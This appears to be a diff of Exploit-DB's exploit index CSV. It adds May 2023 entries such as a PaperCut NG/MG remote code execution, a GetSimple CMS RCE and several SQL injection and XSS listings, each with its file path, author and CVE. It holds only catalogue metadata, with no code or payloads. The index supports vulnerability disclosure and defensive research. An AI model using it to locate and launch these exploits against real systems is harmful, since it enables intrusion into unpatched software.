49039,exploits/multiple/webapps/49039.rb,"Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion (Metasploit)",2020-11-13,SunCSR,webapps,multiple,,2020-11-13,2020-11-13,1,CVE-2020-1938,,,,,
10292,exploits/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting",2009-12-01,MustLive,webapps,multiple,,2009-11-30,2010-07-09,1,,,,,http://www.exploit-db.comjakarta-tomcat-3.2.1.tar.gz,
@@ -11757,6 +11768,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
33731,exploits/multiple/webapps/33731.txt,"Friendly Technologies TR-069 ACS 2.8.9 - Login SQL Injection",2010-03-10,"Yaniv Miron",webapps,multiple,,2010-03-10,2014-06-13,1,,,,,,https://www.securityfocus.com/bid/38634/info
9720,exploits/multiple/webapps/9720.txt,"FSphp 0.2.1 - Multiple Remote File Inclusions",2009-09-18,NoGe,webapps,multiple,,2009-09-17,,1,OSVDB-58317;CVE-2009-3307;OSVDB-58316;OSVDB-58315,,,,,
43442,exploits/multiple/webapps/43442.txt,"FTP Service < 1.2 - Multiple Vulnerabilities",2003-06-03,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00007,,,,,http://gulftech.org/advisories/FTP%20Service%20Multiple%20Vulnerabilities/7
+51480,exploits/multiple/webapps/51480.txt,"FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-25439,,,,,
50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,,
37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,,
50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",2021-08-05,"Amin Bohio",webapps,multiple,,2021-08-05,2021-08-05,0,,,,,,
@@ -12009,6 +12021,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5
51343,exploits/multiple/webapps/51343.txt,"Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-08,omurugur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2022-0020,,,,,
51391,exploits/multiple/webapps/51391.py,"PaperCut NG/MG 22.0.4 - Authentication Bypass",2023-04-25,MaanVader,webapps,multiple,,2023-04-25,2023-04-25,0,CVE-2023-27350,,,,,
+51452,exploits/multiple/webapps/51452.py,"PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)",2023-05-23,MaanVader,webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-27350,,,,,
35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt
50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",2021-10-04,"Yasser Khan",webapps,multiple,,2021-10-04,2021-10-04,0,CVE-2021-41381,,,,,
51099,exploits/multiple/webapps/51099.txt,"Pega Platform 8.1.0 - Remote Code Execution (RCE)",2023-03-28,"Marcin Wolak",webapps,multiple,,2023-03-28,2023-03-28,0,CVE-2022-24082,,,,,
@@ -13523,6 +13536,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
6270,exploits/php/webapps/6270.txt,"Affiliate Directory - 'id' SQL Injection",2008-08-19,"Hussin X",webapps,php,,2008-08-18,2016-11-17,1,CVE-2008-3719;OSVDB-47557,,,,,
5108,exploits/php/webapps/5108.txt,"Affiliate Market 0.1 Beta - 'Language' Local File Inclusion",2008-02-13,GoLd_M,webapps,php,,2008-02-12,2016-11-14,1,OSVDB-41787;CVE-2008-0794,,,,http://www.exploit-db.comaffmarket.30.03.07.zip,
5114,exploits/php/webapps/5114.pl,"Affiliate Market 0.1 Beta - Cross-Site Scripting / SQL Injection",2008-02-14,"Khashayar Fereidani",webapps,php,,2008-02-13,2016-11-14,1,OSVDB-42852;CVE-2008-1177;OSVDB-42851;CVE-2008-1176,,,,http://www.exploit-db.comaffmarket.30.03.07.zip,
+51468,exploits/php/webapps/51468.txt,"Affiliate Me Version 5.0.1 - SQL Injection",2023-05-23,h4ck3r,webapps,php,,2023-05-23,2023-05-23,0,,,,,,
43265,exploits/php/webapps/43265.txt,"Affiliate MLM Script 1.0 - 'product-category.php?key' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80,2017-12-09,2017-12-13,0,CVE-2017-17598,"SQL Injection (SQLi)",,,,
42527,exploits/php/webapps/42527.txt,"Affiliate Niche Script 3.4.0 - SQL Injection",2017-08-21,"Ihsan Sencan",webapps,php,,2017-08-21,2017-08-21,0,,,,,,
50678,exploits/php/webapps/50678.txt,"Affiliate Pro 1.7 - 'Multiple' Cross Site Scripting (XSS)",2022-01-19,Vulnerability-Lab,webapps,php,,2022-01-19,2022-01-19,0,,,,,,
@@ -14635,6 +14649,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9472,exploits/php/webapps/9472.txt,"Best Dating Script - Arbitrary File Upload",2009-08-18,jetli007,webapps,php,,2009-08-17,,1,,,,,,
51280,exploits/php/webapps/51280.txt,"Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload",2023-04-06,"Ahmed Ismail",webapps,php,,2023-04-06,2023-05-18,1,CVE-2023-0943,,,,,
51279,exploits/php/webapps/51279.txt,"Best pos Management System v1.0 - SQL Injection",2023-04-06,"Ahmed Ismail",webapps,php,,2023-04-06,2023-04-06,0,,,,,,
+51462,exploits/php/webapps/51462.py,"Best POS Management System v1.0 - Unauthenticated Remote Code Execution",2023-05-23,"Mesut Cetin",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
49122,exploits/php/webapps/49122.txt,"Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)",2020-11-27,Ex.Mi,webapps,php,,2020-11-27,2020-12-01,0,CVE-2020-24963,,,,,
10655,exploits/php/webapps/10655.txt,"Best Top List - Cross-Site Scripting",2009-12-25,indoushka,webapps,php,,2009-12-24,,1,OSVDB-61372,,,,,
10685,exploits/php/webapps/10685.txt,"Best Top List 2.11 - Arbitrary File Upload",2009-12-26,indoushka,webapps,php,,2009-12-25,,0,,,,,,
@@ -14862,6 +14877,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,,2020-10-23,2020-11-13,1,CVE-2019-17240,,,,,
49037,exploits/php/webapps/49037.rb,"Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)",2020-11-13,Aporlorxl23,webapps,php,,2020-11-13,2020-11-13,1,,,,,,
51360,exploits/php/webapps/51360.txt,"Bludit 4.0.0-rc-2 - Account takeover",2023-04-14,nu11secur1ty,webapps,php,,2023-04-14,2023-04-14,0,,,,,,
+51476,exploits/php/webapps/51476.txt,"Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-31698,,,,,
46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,80,2018-12-27,2019-01-02,0,CVE-2018-1000811,,,,http://www.exploit-db.combludit-3.0.0.zip,
11360,exploits/php/webapps/11360.txt,"Blue Dove - SQL Injection",2010-02-08,HackXBack,webapps,php,,2010-02-07,,0,,,,,,
7797,exploits/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - 'clanek' Blind SQL Injection",2009-01-15,darkjoker,webapps,php,,2009-01-14,2017-01-17,1,OSVDB-51769;CVE-2009-0425,,,,,
@@ -15501,6 +15517,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51319,exploits/php/webapps/51319.py,"ChurchCRM 4.5.1 - Authenticated SQL Injection",2023-04-07,Arvandy,webapps,php,,2023-04-07,2023-04-07,0,CVE-2023-24787,,,,,
51397,exploits/php/webapps/51397.txt,"ChurchCRM v4.5.3 - Authenticated SQL Injection",2023-04-27,"Iyaad Luqman K",webapps,php,,2023-04-27,2023-05-07,1,CVE-2023-24685,,,,,
51296,exploits/php/webapps/51296.txt,"ChurchCRM v4.5.3-121fcc1 - SQL Injection",2023-04-06,nu11secur1ty,webapps,php,,2023-04-06,2023-04-06,0,,,,,,
+51477,exploits/php/webapps/51477.txt,"ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-31699,,,,,
15887,exploits/php/webapps/15887.txt,"ChurchInfo 1.2.12 - SQL Injection",2011-01-01,dun,webapps,php,,2011-01-01,2011-01-01,1,OSVDB-70253,,,,http://www.exploit-db.comchurchinfo-1.2.12.zip,
36874,exploits/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",webapps,php,,2012-02-22,2015-05-01,1,CVE-2012-1001;OSVDB-79456,,,,,https://www.securityfocus.com/bid/52115/info
36875,exploits/php/webapps/36875.txt,"Chyrp 2.1.2 - '/includes/error.php?body' Cross-Site Scripting",2012-02-22,"High-Tech Bridge SA",webapps,php,,2012-02-22,2015-05-01,1,CVE-2012-1001;OSVDB-79455,,,,,https://www.securityfocus.com/bid/52117/info
@@ -15537,6 +15554,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47046,exploits/php/webapps/47046.txt,"CiuisCRM 1.6 - 'eventType' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,80,2019-07-01,2019-07-03,0,,"SQL Injection (SQLi)",,,,
11124,exploits/php/webapps/11124.txt,"CiviCRM 3.1 < Beta 5 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-13,h00die,webapps,php,,2010-01-12,,1,,,,,http://www.exploit-db.comcivicrm-3.1.beta1-standalone.tar.gz,
35327,exploits/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",webapps,php,,2011-02-08,2014-11-23,1,,,,,,https://www.securityfocus.com/bid/46275/info
+51478,exploits/php/webapps/51478.txt,"CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-25440,,,,,
34749,exploits/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 - 'admin_index.php' Cross-Site Scripting",2009-07-21,Moudi,webapps,php,,2009-07-21,2014-09-23,1,CVE-2009-3509;OSVDB-56181,,,,,https://www.securityfocus.com/bid/43498/info
25623,exploits/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 - 'OUT.php' SQL Injection",2005-05-06,Kold,webapps,php,,2005-05-06,2016-12-22,1,CVE-2005-1506;OSVDB-16159,,,,,https://www.securityfocus.com/bid/13533/info
6536,exploits/php/webapps/6536.pl,"CJ Ultra Plus 1.0.4 - Cookie SQL Injection",2008-09-22,-SmoG-,webapps,php,,2008-09-21,,1,OSVDB-48724;CVE-2008-4241,,,,,
@@ -17356,6 +17374,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9235,exploits/php/webapps/9235.php,"e107 Plugin my_gallery 2.4.1 - 'readfile()' Local File Disclosure",2009-07-23,NoGe,webapps,php,,2009-07-22,,1,,,,,,
8417,exploits/php/webapps/8417.txt,"e107 Plugin userjournals_menu - 'blog.id' SQL Injection",2009-04-13,boom3rang,webapps,php,,2009-04-12,,1,OSVDB-53641,,,,,
7184,exploits/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 - 'product' SQL Injection",2008-11-22,NoGe,webapps,php,,2008-11-21,2017-01-03,1,OSVDB-50171;CVE-2008-6114,,,,,
+51449,exploits/php/webapps/51449.txt,"e107 v2.3.2 - Reflected XSS",2023-05-23,"Hubert Wojciechowski",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
24138,exploits/php/webapps/24138.txt,"e107 Website System 0.5/0.6 - 'Log.php' HTML Injection",2004-05-21,Chinchilla,webapps,php,,2004-05-21,2013-01-15,1,CVE-2004-2028;OSVDB-6345,,,,,https://www.securityfocus.com/bid/10395/info
22958,exploits/php/webapps/22958.txt,"e107 Website System 0.554 - HTML Injection",2003-07-25,"Pete Foster",webapps,php,,2003-07-25,2012-11-27,1,OSVDB-2305,,,,,https://www.securityfocus.com/bid/8279/info
22956,exploits/php/webapps/22956.txt,"e107 Website System 0.555 - 'db.php' Information Disclosure",2003-07-24,"Artoor Petrovich",webapps,php,,2003-07-24,2012-11-27,1,OSVDB-3856,,,,,https://www.securityfocus.com/bid/8273/info
@@ -18255,7 +18274,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
12763,exploits/php/webapps/12763.txt,"File Share scriptFile share - SQL Injection",2010-05-27,MouDy-Dz,webapps,php,,2010-05-26,,0,,,,,,
6040,exploits/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injections",2008-07-11,"Nu Am Bani",webapps,php,,2008-07-10,2016-12-14,1,OSVDB-23864;CVE-2006-1278;OSVDB-23863,,,,http://www.exploit-db.comfilestore.zip,
12617,exploits/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",webapps,php,,2010-05-15,2017-07-14,0,OSVDB-55934,,file_thingie_v255_Jeremiah.zip,,,
-51436,exploits/php/webapps/51436.py,"File Thingie 2.5.7 - Remote Code Execution (RCE)",2023-05-05,"Maurice Fielenbach (grimlockx)",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
+51436,exploits/php/webapps/51436.py,"File Thingie 2.5.7 - Remote Code Execution (RCE)",2023-05-05,"Maurice Fielenbach",webapps,php,,2023-05-05,2023-05-23,0,,,,,,
10689,exploits/php/webapps/10689.txt,"file upload Ar Version - Arbitrary File Upload",2009-12-26,indoushka,webapps,php,,2009-12-25,,0,,,,,,
11450,exploits/php/webapps/11450.txt,"File Upload Manager 1.3 - Web Shell File Upload",2010-02-14,ROOT_EGY,webapps,php,,2010-02-13,2017-11-15,0,,,,,,
30467,exploits/php/webapps/30467.txt,"File Uploader 1.1 - 'datei.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,webapps,php,,2007-08-09,2013-12-24,1,CVE-2007-4327;OSVDB-36425,,,,,https://www.securityfocus.com/bid/25253/info
@@ -18979,6 +18998,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49774,exploits/php/webapps/49774.py,"GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery",2021-04-16,boku,webapps,php,,2021-04-16,2021-10-29,0,,,,,,
49798,exploits/php/webapps/49798.py,"GetSimple CMS My SMTP Contact Plugin 1.1.2 - Persistent Cross-Site Scripting",2021-04-23,boku,webapps,php,,2021-04-23,2021-11-01,0,,,,,,
48745,exploits/php/webapps/48745.txt,"GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)",2020-08-13,boku,webapps,php,,2020-08-13,2020-08-13,0,,,,,,
+51475,exploits/php/webapps/51475.py,"GetSimple CMS v3.3.16 - Remote Code Execution (RCE)",2023-05-23,"Youssef Muhammad",webapps,php,,2023-05-23,2023-05-23,0,CVE-2022-41544,,,,,
4738,exploits/php/webapps/4738.txt,"gf-3xplorer 2.4 - Cross-Site Scripting / Local File Inclusion",2007-12-18,MhZ91,webapps,php,,2007-12-17,2016-10-20,1,OSVDB-44780;CVE-2007-6476;OSVDB-44779;CVE-2007-6475;OSVDB-41376;CVE-2007-6474;OSVDB-41375,,,,http://www.exploit-db.comGF-3XPLORER_2.4_.rar,
645,exploits/php/webapps/645.pl,"GFHost PHP GMail - Remote Command Execution",2004-11-21,spabam,webapps,php,,2004-11-20,,1,OSVDB-11626,,,,,http://www.zone-h.org/advisories/read/id=4904
25693,exploits/php/webapps/25693.txt,"GForge 3.x - Arbitrary Command Execution",2005-05-24,"Filippo Spike Morelli",webapps,php,,2005-05-24,2013-05-24,1,CVE-2005-1752;OSVDB-16930,,,,,https://www.securityfocus.com/bid/13716/info
@@ -22231,6 +22251,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31528,exploits/php/webapps/31528.txt,"Le Forum - 'Fichier_Acceuil' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php,,2008-03-24,2014-02-10,1,,,,,,https://www.securityfocus.com/bid/28423/info
5887,exploits/php/webapps/5887.pl,"LE.CMS 1.4 - Arbitrary File Upload",2008-06-21,t0pP8uZz,webapps,php,,2008-06-20,,1,OSVDB-46498;CVE-2008-2833,,,,,
36647,exploits/php/webapps/36647.txt,"Lead Capture - 'login.php' Script Cross-Site Scripting",2012-01-21,HashoR,webapps,php,,2012-01-21,2015-04-06,1,CVE-2012-0932;OSVDB-78455,,,,,https://www.securityfocus.com/bid/51785/info
+51471,exploits/php/webapps/51471.txt,"LeadPro CRM v1.0 - SQL Injection",2023-05-23,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
11889,exploits/php/webapps/11889.txt,"leaftec CMS - Multiple Vulnerabilities",2010-03-26,Valentin,webapps,php,,2010-03-25,,1,OSVDB-63417;OSVDB-63416,,,,,
8576,exploits/php/webapps/8576.pl,"Leap CMS 0.1.4 - 'searchterm' Blind SQL Injection",2009-04-30,YEnH4ckEr,webapps,php,,2009-04-29,,1,OSVDB-54405;CVE-2009-1613,,,,,
8577,exploits/php/webapps/8577.txt,"Leap CMS 0.1.4 - SQL Injection / Cross-Site Scripting / Arbitrary File Upload",2009-04-30,YEnH4ckEr,webapps,php,,2009-04-29,,1,OSVDB-54405;CVE-2009-1615;OSVDB-54404;CVE-2009-1614;OSVDB-54403;OSVDB-54402;CVE-2009-1613,,,,,
@@ -27727,6 +27748,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
8866,exploits/php/webapps/8866.php,"Podcast Generator 1.2 - Unauthorized Re-Installation",2009-06-03,StAkeR,webapps,php,,2009-06-02,2016-11-23,1,OSVDB-67403;OSVDB-67402;OSVDB-67401;OSVDB-67400;OSVDB-67399;OSVDB-67398;OSVDB-67397;OSVDB-67396;OSVDB-67395;OSVDB-67393;OSVDB-67392;OSVDB-67391;OSVDB-67390;OSVDB-67389;OSVDB-67388;OSVDB-67387;OSVDB-67386;OSVDB-55258;OSVDB-55257;OSVDB-55256,,,,http://www.exploit-db.compodcastgen1.2.zip,
16109,exploits/php/webapps/16109.txt,"Podcast Generator 1.3 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",webapps,php,,2011-02-04,2016-11-14,1,,,,,http://www.exploit-db.compodcastgen1.3.zip,http://www.htbridge.ch/advisory/local_file_inclusion_in_podcast_generator.html
49866,exploits/php/webapps/49866.txt,"Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)",2021-05-14,"Ayşenur KARAASLAN",webapps,php,,2021-05-14,2021-05-14,0,,,,,http://www.exploit-db.comPodcastGenerator-3.1.zip,
+51454,exploits/php/webapps/51454.txt,"PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
26414,exploits/php/webapps/26414.txt,"PodHawk 1.85 - Arbitrary File Upload",2013-06-24,"CWH Underground",webapps,php,,2013-06-24,2013-06-24,0,OSVDB-94549,,,,,
11473,exploits/php/webapps/11473.txt,"Pogodny CMS - SQL Injection",2010-02-16,Ariko-Security,webapps,php,,2010-02-15,,1,OSVDB-62343;CVE-2010-0671,,,,,
17141,exploits/php/webapps/17141.txt,"Point Market System 3.1x vBulletin plugin - SQL Injection",2011-04-10,Net.Edit0r,webapps,php,,2011-04-10,2011-04-10,0,,,,,http://www.exploit-db.comPointMarket3.1.0Alpha1.rar,
@@ -27992,6 +28014,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48347,exploits/php/webapps/48347.txt,"Prestashop 1.7.6.4 - Cross-Site Request Forgery",2020-04-20,"Sivanesh Ashok",webapps,php,,2020-04-20,2020-06-18,0,,,,,,
49755,exploits/php/webapps/49755.py,"PrestaShop 1.7.6.7 - 'location' Blind Sql Injection",2021-04-09,"Vanshal Gaur",webapps,php,,2021-04-09,2021-04-09,0,CVE-2020-15160,,,,,
49410,exploits/php/webapps/49410.txt,"Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection",2021-01-11,"Jaimin Gondaliya",webapps,php,,2021-01-11,2021-01-11,0,,,,,,
+51463,exploits/php/webapps/51463.txt,"Prestashop 8.0.4 - CSV injection",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
45046,exploits/php/webapps/45046.py,"PrestaShop < 1.6.1.19 - 'AES CBC' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,,2018-07-18,2018-07-18,0,CVE-2018-13784,,,,,https://github.com/ambionics/prestashop-exploits/blob/3bcb6af9954c03f269623c4752788f8de80602b9/prestashop_aes_cbc/prestashop_cbc_read.py
45047,exploits/php/webapps/45047.txt,"PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,,2018-07-18,2018-07-18,0,CVE-2018-13784,,,,,https://ambionics.io/blog/prestashop-privilege-escalation
51001,exploits/php/webapps/51001.py,"Prestashop blockwishlist module 2.1.0 - SQLi",2022-08-09,"Karthik UJ",webapps,php,,2022-08-09,2022-08-09,0,CVE-2022-31101,,,,,
@@ -28341,6 +28364,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
11554,exploits/php/webapps/11554.txt,"QuickDev 4 PHP - Database Disclosure",2010-02-23,ViRuSMaN,webapps,php,,2010-02-22,,1,,,,,,
5733,exploits/php/webapps/5733.txt,"QuickerSite 1.8.5 - Multiple Vulnerabilities",2008-06-03,BugReport.IR,webapps,php,,2008-06-02,,1,OSVDB-46738;CVE-2008-6678;OSVDB-46736;CVE-2008-6677;OSVDB-46228;CVE-2008-6676;OSVDB-46227;CVE-2008-6675;OSVDB-46226;OSVDB-46225;OSVDB-46224;OSVDB-46223;CVE-2008-6674;OSVDB-46222;CVE-2008-6673;OSVDB-46221;OSVDB-46220;OSVDB-46219,,,,,http://bugreport.ir/index.php?/39
4193,exploits/php/webapps/4193.txt,"QuickEStore 8.2 - 'insertorder.cfm' SQL Injection",2007-07-18,meoconx,webapps,php,,2007-07-17,,1,OSVDB-36358;CVE-2007-3933,,,,,
+51474,exploits/php/webapps/51474.txt,"Quicklancer v1.0 - SQL Injection",2023-05-23,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
26828,exploits/php/webapps/26828.txt,"QuickPayPro 3.1 - 'customer.tickets.view.php' Multiple SQL Injections",2005-12-14,r0t,webapps,php,,2005-12-14,2013-07-15,1,CVE-2005-4243;OSVDB-21677,,,,,https://www.securityfocus.com/bid/15863/info
26830,exploits/php/webapps/26830.txt,"QuickPayPro 3.1 - 'design.php?delete' SQL Injection",2005-12-14,r0t,webapps,php,,2005-12-14,2013-07-15,1,CVE-2005-4243;OSVDB-21679,,,,,https://www.securityfocus.com/bid/15863/info
26827,exploits/php/webapps/26827.txt,"QuickPayPro 3.1 - 'popups.edit.php?popupid' SQL Injection",2005-12-14,r0t,webapps,php,,2005-12-14,2013-07-15,1,CVE-2005-4243;OSVDB-21676,,,,,https://www.securityfocus.com/bid/15863/info
@@ -29489,6 +29513,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35877,exploits/php/webapps/35877.txt,"Sitemagic CMS - 'SMTpl' Directory Traversal",2011-06-23,"Andrea Bocchetti",webapps,php,,2011-06-23,2015-01-23,1,,,,,,https://www.securityfocus.com/bid/48399/info
35871,exploits/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Cross-Site Scripting",2011-06-21,"Gjoko Krstic",webapps,php,,2011-06-21,2015-01-23,1,OSVDB-73201,,,,,https://www.securityfocus.com/bid/48355/info
48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php,,2020-09-03,2020-09-03,0,,,,,,
+51464,exploits/php/webapps/51464.txt,"SitemagicCMS 4.4.3 - Remote Code Execution (RCE)",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
44793,exploits/php/webapps/44793.txt,"Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection",2018-05-29,"Divya Jain",webapps,php,,2018-05-29,2018-05-29,0,CVE-2018-11535,,,,,
25052,exploits/php/webapps/25052.pl,"Siteman 1.1 - User Database Privilege Escalation (1)",2005-01-19,"Noam Rathaus",webapps,php,,2005-01-19,2013-04-28,1,CVE-2005-0305;OSVDB-13811,,,,,https://www.securityfocus.com/bid/12304/info
25053,exploits/php/webapps/25053.html,"Siteman 1.1 - User Database Privilege Escalation (2)",2005-01-19,amironline452,webapps,php,,2005-01-19,2013-04-28,1,CVE-2005-0305;OSVDB-13811,,,,,https://www.securityfocus.com/bid/12304/info
@@ -29571,6 +29596,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
10437,exploits/php/webapps/10437.txt,"Smart PHP Subscriber - Multiple Disclosure Vulnerabilities",2009-12-14,"Milos Zivanovic",webapps,php,,2009-12-13,,1,CVE-2007-0518;OSVDB-32946,,,,,
10727,exploits/php/webapps/10727.txt,"Smart PHP Uploader 1.0 - Arbitrary File Upload",2009-12-27,Phenom,webapps,php,,2009-12-26,,1,,,,,http://www.exploit-db.comphpuploader.zip,
5003,exploits/php/webapps/5003.txt,"Smart Publisher 1.0.1 - 'filedata' Remote Code Execution",2008-01-29,GoLd_M,webapps,php,,2008-01-28,2016-11-14,1,OSVDB-40780;CVE-2008-0503,,,,http://www.exploit-db.comsmart-publisher-1.0.1.zip,
+51472,exploits/php/webapps/51472.txt,"Smart School v1.0 - SQL Injection",2023-05-23,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
45049,exploits/php/webapps/45049.txt,"Smart SMS & Email Manager 3.3 - 'contact_type_id' SQL Injection",2018-07-18,AkkuS,webapps,php,80,2018-07-18,2018-07-18,0,,"SQL Injection (SQLi)",,,,
34067,exploits/php/webapps/34067.txt,"Smart Statistics 1.0 - 'smart_Statistics_admin.php' Cross-Site Scripting",2010-01-10,R3d-D3V!L,webapps,php,,2010-01-10,2014-07-15,1,,,,,,https://www.securityfocus.com/bid/40468/info
10977,exploits/php/webapps/10977.txt,"Smart Vision Script News - 'newsdetail.php' SQL Injection (1)",2010-01-03,Err0R,webapps,php,,2010-01-02,,1,,,,,,
@@ -29972,6 +29998,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
24227,exploits/php/webapps/24227.txt,"SqWebMail 4.0.4.20040524 - Email Header HTML Injection",2004-06-21,"Luca Legato",webapps,php,,2004-06-21,2013-01-19,1,CVE-2004-0591;OSVDB-7214,,,,,https://www.securityfocus.com/bid/10588/info
26200,exploits/php/webapps/26200.txt,"SqWebMail 5.0.4 - HTML Email IMG Tag Script Injection",2005-08-29,"Jakob Balle",webapps,php,,2005-08-29,2013-06-14,1,CVE-2005-2769;OSVDB-19047,,,,,https://www.securityfocus.com/bid/14676/info
8636,exploits/php/webapps/8636.txt,"ST-Gallery 0.1a - Multiple SQL Injections",2009-05-07,YEnH4ckEr,webapps,php,,2009-05-06,,1,OSVDB-54793;CVE-2009-1799,,,,,
+51473,exploits/php/webapps/51473.txt,"Stackposts Social Marketing Tool v1.0 - SQL Injection",2023-05-23,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
25189,exploits/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 - PHP Remote File Inclusion",2005-03-04,"Filip Groszynski",webapps,php,,2005-03-04,2013-05-04,1,,,,,,https://www.securityfocus.com/bid/12726/info
25192,exploits/php/webapps/25192.pl,"Stadtaus.Com PHP Form Mail Script 2.3 - Remote File Inclusion",2005-03-05,mozako,webapps,php,,2005-03-05,2013-05-04,1,,,,,,https://www.securityfocus.com/bid/12735/info
36031,exploits/php/webapps/36031.txt,"StaMPi - Local File Inclusion",2015-02-09,"e . V . E . L",webapps,php,,2015-02-09,2015-02-09,0,,,,,,
@@ -30516,6 +30543,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9674,exploits/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - Authentication Bypass",2009-09-15,snakespc,webapps,php,,2009-09-14,,1,OSVDB-58249,,,,,
